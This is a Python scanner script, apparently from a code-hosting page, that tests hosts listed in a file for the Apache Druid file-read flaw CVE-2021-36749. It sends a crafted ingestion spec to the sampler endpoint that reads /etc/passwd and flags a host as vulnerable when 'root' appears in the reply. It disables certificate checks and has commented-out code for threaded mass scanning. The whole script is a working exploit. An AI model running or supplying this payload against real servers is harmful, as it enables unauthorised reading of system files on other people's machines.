1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| # -*- coding: utf-8 -*- import requests # import threadpool
requests.packages.urllib3.disable_warnings()
def verify(urls): url = urls + '/druid/indexer/v1/sampler?for=connect' print(url) headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'} data = {"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["file:///etc/passwd"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}} try: res = requests.post(url, headers=headers, json=data, timeout=10, verify=False, allow_redirects=False) # print(res.text) if 'root' in res.text: info = '[+] 存在CVE-2021-36749漏洞: ' + urls print(info) except Exception as e: pass
def get_url(): with open('urls.txt', 'r', encoding='UTF-8') as f: urls = f.readlines() urls = [url.strip() for url in urls if url and url.strip()] return urls
if __name__ == '__main__': urls = get_url() for url in urls: verify(url) # pool = threadpool.ThreadPool(50) # res = threadpool.makeRequests(verify, url) # [pool.putRequest(req) for req in res] # pool.wait()
|